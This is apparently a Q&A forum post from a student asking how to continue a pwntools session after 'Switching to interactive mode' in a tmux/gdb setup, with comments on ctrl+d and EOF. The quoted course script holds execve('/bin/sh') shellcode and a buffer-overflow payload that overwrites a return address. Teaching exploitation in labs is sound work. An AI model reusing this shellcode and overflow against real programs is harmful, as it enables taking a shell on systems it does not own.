# How to resume/continue a program in python interactive mode?

Tags: python, assembly, gdb, tmux

I'm trying to debug a binary file that's attached to a python program, which passes arguments for the binary.
This is the program written by my prof.

```
from pwn import *
import time
context.terminal = ['tmux', 'splitw', '-h']

r = process("./shellcode")

gdb.attach(r)
    
time.sleep(3)

shell = b"\xEB\x14\x5F\x48\x89\xFE\x48\x83\xC6\x08\x48\x89\xF2\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05\xE8\xE7\xFF\xFF\xFF/bin/sh\x00\x00\x00\x00\x00\x00\x00\x00"

r.recvuntil(b"What is your name?")

payload = shell.ljust(1016, b"A") + p64(0x601080)

r.send( payload )
r.interactive()
```

After the program is run it pauses and shows the screen below

[image: terminal screen]

it says [*] Switching to interactive mode

And then my prof presses a certain key to make it continue. I can't figure out what he presses or does to make the program continue after that... please help!

I've tried continuing the program from gdb but it again pauses. I want to know how to continue the program from the python(left) pane

Comment: Could it be `ctrl+d` to close stdin?

Comment: @Jester: normally `ctrl+d` doesn't "close" stdin, unless tmux is special.  It's normally the EOF character, so pressing it makes `read(0, buf, len)` return `0`.   (If there was no input already typed on the line).   Most programs treat that as EOF and don't make another read system call on the same file descriptor, but they could and would be able to read new stuff you typed.  `strace cat` (or `cat` and attach and `strace` to it in another window) is a good way to play with ctrl+d semantics on a TTY in the default "cooked" mode.